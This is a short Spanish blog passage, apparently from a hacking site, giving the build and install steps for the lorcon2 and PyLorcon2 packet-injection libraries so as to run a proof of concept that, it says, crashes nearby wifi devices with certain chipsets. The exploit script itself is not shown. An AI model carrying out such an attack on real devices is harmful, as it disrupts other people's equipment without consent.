Para llevar a cabo la prueba de concepto, que el script sea funcional y echándole un ojo al código, nos damos cuenta que necesitamos tener instalado PyLorcon2 

Procederemos a bajarlo directamente desde la consola:


svn co http://802.11ninja.net/svn/lorcon/tags/lorcon2-200911-rc1/ lorcon2-200911-rc1

Instalamos el software necesario para construir lorcon2 and pylorcon2.

sudo apt-get install libpcap-dev libnl-dev python-dev

procederemos a compilar lordcom2:

$ cd lorcon2-200911-rc1
$ ./configure --libdir=/usr/lib...
$ make...
$ sudo make install...

El próximo paso será bajarnos e instalar pylorcom2:

$ svn co http://pylorcon2.googlecode.com/svn/trunk pylorcon2
...
$ cd pylorcon2...
$ python setup.py build...
$ python setup.py install...

ahora testeamos el funcionamiento:

y procedemos a la prueba de concepto:

En seguida veremos a nuestra tarjeta de red "echa mistos":
 

y voilá!!! Cualquier dispositivo wifi con los chipset anteriormente mencionados caerá fulminado  ..a 30 mts a la redonda... con tan sólo realizar un escaneo de redes...

Sed buenos :D

Fuentes: http://unaaldia.hispasec.com/

              http://code.google.com/p/pylorcon2/
http://www.hackplayers.com
Powered by Bad Robot
Helped by Blackubay